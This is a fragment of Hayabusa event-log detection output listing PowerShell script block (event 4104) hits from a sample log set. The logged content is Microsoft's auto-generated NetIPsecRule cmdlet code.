${RemoteTunnelHostname}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${User}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Machine}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Protocol}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters 
$__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPsecRuleName')) { [object]$__cmdletization_value = ${IPsecRuleName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false 
if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSe",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.080 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"t')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value 
= $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = 
${AllowWatchKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 
'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecRule' -Alias '*' function Show-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])][OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement')] param( [Parameter(ParameterSetName='EnumerateFull1')] [string] ${PolicyStore}, [Parameter(ParameterSetName",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.080 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"t')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = 